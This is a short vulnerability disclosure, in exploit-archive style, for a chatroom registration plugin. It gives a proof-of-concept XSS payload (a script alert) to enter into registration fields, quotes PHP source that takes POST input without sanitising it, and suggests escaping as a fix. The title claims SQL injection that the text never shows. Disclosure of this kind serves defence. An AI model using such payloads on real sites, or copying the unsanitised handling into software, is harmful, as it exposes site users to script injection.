[+] Exploit Title ; Etchat Register Plugin Sql Injection / XSS vulnerability
[+] Date : 2018-02-22
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] With this plugin the users can register on chatrooms
[+] Poc :
[!] insert your payload on script Fileds
[!] Payload : <script>alert(String.fromCharCode(88, 83, 83))</script>
[!] now you can see 0P3N3R on page
[+] Exploitation Technique:
[!] remote
[+] Severity Level:
[!] Low
[+] Request Method :
[!] POST
[+] Vulnerable files :
[!] register.php
[+] Vulnerable Source :
If ($_POST['submit'] && isset($_COOKIE['cookie_etchat_nik_registered'])){
echo "<div class=\"sum-c\">شما در 24 ساعته گذشته ، ثبت نام کرده اید !</div>";
}Else{
$username = $_POST['username'];
$password = $_POST['password'];
$Aemail = $_POST['Aemail'];
$Acity = $_POST['Acity'];
$Abirit = $_POST['Abirit'];
$ip = $_SERVER['REMOTE_ADDR'];
$E = 0;
[+] Fix :
[!] Restrict user input or replace bad characters or use htmlspecialchars and htmlentities
[+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!hp [+] BaxTurk24